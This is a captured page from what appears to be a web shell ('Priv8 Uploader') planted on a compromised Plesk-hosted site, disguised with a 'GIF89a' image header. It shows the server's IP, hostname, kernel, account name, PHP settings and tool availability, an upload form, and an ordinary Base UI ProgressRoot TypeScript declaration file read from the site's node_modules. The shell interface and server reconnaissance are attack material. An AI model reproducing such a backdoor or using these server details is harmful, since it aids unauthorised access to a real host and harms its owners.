GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.216.249 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/@base-ui/react/progress/root/ |
Upload File : |
import * as React from 'react';
import { BaseUIComponentProps } from "../../internals/types.js";
/**
* Groups all parts of the progress bar and provides the task completion status to screen readers.
* Renders a `<div>` element.
*
* Documentation: [Base UI Progress](https://base-ui.com/react/components/progress)
*/
export declare const ProgressRoot: React.ForwardRefExoticComponent<Omit<ProgressRootProps, "ref"> & React.RefAttributes<HTMLDivElement>>;
export type ProgressStatus = 'indeterminate' | 'progressing' | 'complete';
export interface ProgressRootState {
/**
* The current status.
*/
status: ProgressStatus;
}
export interface ProgressRootProps extends BaseUIComponentProps<'div', ProgressRootState> {
/**
* A string value that provides a user-friendly name for `aria-valuenow`, the current value of the progress bar.
*/
'aria-valuetext'?: React.AriaAttributes['aria-valuetext'] | undefined;
/**
* Options to format the value.
*/
format?: Intl.NumberFormatOptions | undefined;
/**
* Accepts a function which returns a string value that provides a human-readable text alternative for the current value of the progress bar.
*/
getAriaValueText?: ((formattedValue: string | null, value: number | null) => string) | undefined;
/**
* The locale used by `Intl.NumberFormat` when formatting the value.
* Defaults to the user's runtime locale.
*/
locale?: Intl.LocalesArgument | undefined;
/**
* The maximum value.
* @default 100
*/
max?: number | undefined;
/**
* The minimum value.
* @default 0
*/
min?: number | undefined;
/**
* The current value. The component is indeterminate when value is `null`.
* @default null
*/
value: number | null;
}
export declare namespace ProgressRoot {
type State = ProgressRootState;
type Props = ProgressRootProps;
}